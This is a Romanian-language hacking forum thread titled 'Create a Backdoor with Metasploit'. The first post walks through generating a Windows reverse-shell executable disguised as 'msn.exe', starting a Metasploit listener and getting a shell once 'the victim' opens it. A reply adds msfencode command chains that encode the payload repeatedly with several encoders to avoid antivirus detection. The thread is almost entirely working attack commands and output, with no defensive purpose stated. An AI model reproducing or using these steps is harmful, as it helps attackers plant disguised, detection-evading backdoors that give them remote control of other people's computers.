Jump to content
dr.d3v1l

Creaţi un Backdoor cu Metasploit

Recommended Posts

msfpayload windows/shell_reverse_tcp LHOST=192.168.1.10 (ip) LPORT=31337 (port) X >/tmp/msn.exe (nume backdoor)

înainte ca cineva s?-l deschida trebuie sa setam msf.

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/shell/reverse_tcp

payload => windows/shell/reverse_tcp.

msf exploit(handler) > set LHOST 192.168.1.101

LHOST => 192.168.1.101

msf exploit(handler) > set LPORT 31337

LPORT => 31337

msf exploit(handler) > exploit

[*] Started reverse handler on port 31337

[*] Starting the payload handler…

sa vedem ce se întâmpl? atunci când victim? il deschide :D

[*] Sending stage (240 bytes)

[*] Command shell session 1 opened (192.168.1.10:31337 -> 192.168.1.253:1049)

Microsoft Windows XP [Versione 5.1.2600]

© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\ago\Documenti\Download>

Link to comment
Share on other sites

slab nu vreu sa te atac sau alceva dar o gramada de tutoriale metasploit pe net, nici macar nu ai folosit encoder pentru a coda conectiunea meterpreter asa cum ai prezentat tu din prima il depisteaza ca virus

./msfencode -l

Framework Encoders

==================

Name Rank Description

---- ---- -----------

cmd/generic_sh normal Generic Shell Variable Substitution Command Encoder

generic/none normal The "none" Encoder

mipsbe/longxor normal XOR Encoder

mipsle/longxor normal XOR Encoder

php/base64 normal PHP Base64 encoder

ppc/longxor normal PPC LongXOR Encoder

ppc/longxor_tag normal PPC LongXOR Encoder

sparc/longxor_tag normal SPARC DWORD XOR Encoder

x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder

x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder

x86/avoid_utf8_tolower manual Avoid UTF8/tolower

x86/call4_dword_xor normal Call+4 Dword XOR Encoder

x86/countdown normal Single-byte XOR Countdown Encoder

x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder

x86/jmp_call_additive great Polymorphic Jump/Call XOR Additive Feedback Encoder

x86/nonalpha low Non-Alpha Encoder

x86/nonupper low Non-Upper Encoder

x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder

x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder

x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

./msfpayload windows/shell_reverse_tcp LHOST=IP LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/bla.exe

Sau folosesti trei encodere diferite, dintre care doua le va rula prin intermediul de 10 ori fiecare encoder, pentru un total de 21 codificare

./msfpayload windows/shell_reverse_tcp LHOST=IP LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/bla1.exe

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...